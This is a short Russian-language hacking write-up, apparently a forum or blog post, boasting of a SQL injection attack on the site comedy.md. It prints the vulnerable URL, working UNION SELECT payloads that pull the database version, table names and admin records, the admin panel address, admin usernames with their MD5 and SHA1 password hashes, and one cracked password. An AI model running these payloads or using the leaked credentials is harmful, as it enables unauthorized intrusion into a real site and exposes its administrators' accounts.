Comedy Club Молдованский стайл
http://www.comedy.md/residents.php?id=43'
версия, как мы узнаем, пятая, что не может не радовать наши шалавливые ручки..
http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database())/*
на сайте есть форум
phpbb, стандартный префикс к таблицам у которого
phpbb_, молдованские админы ничего не стали придумывать, им итак, видно, весело. находим запись пользователя с подозрительным ником
admin и хеш к его паролю -
92608e8ef9fd8c3f4e896c63e0e26e79, обращаемся к passcracking.ру, милый сервис просит подождать часок-другой-пятый, идем на форум, глядим на юзера следующего за админом с менее амбициозным ником
zornig, но тем не менее с правами админа. Хеш
7694f4a66316e53c8cdd9d9954bd611d уж слишком брутальный для любого админа, ибо пароль к нему просто буква
q.
админка по адресу
http://www.comedy.md/controlpanel/
нагло плюется в нашу сторону ошибкой. А жаль ведь мы уже нашли таблицу
tbladmins
http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,table_name)+f rom+information_schema.tables+limit+46,1/*
и выловили из нее интересные вещи :
http://www.comedy.md/residents.php?id=-43+union+select+1,2,3,concat_ws(0x3a,admid,adminlo gin,adminpwd,status)+from+tbladmins+limit+0,1/*
4:comedy:f682468003680f7e3add8888ce60ffa51b6a917b
хеш, кстати,
sha1, ну да бог с ним, все равно он нам не понадобится...
конец.